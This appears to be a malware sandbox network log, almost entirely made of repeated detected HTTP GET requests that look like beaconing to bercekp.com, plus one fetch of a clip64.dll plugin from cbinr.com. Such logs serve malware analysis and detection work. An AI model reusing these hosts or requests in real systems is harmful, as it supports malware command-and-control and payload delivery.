                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /forum/Plugins/clip64.dll HTTP/1.1Host: cbinr.com
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
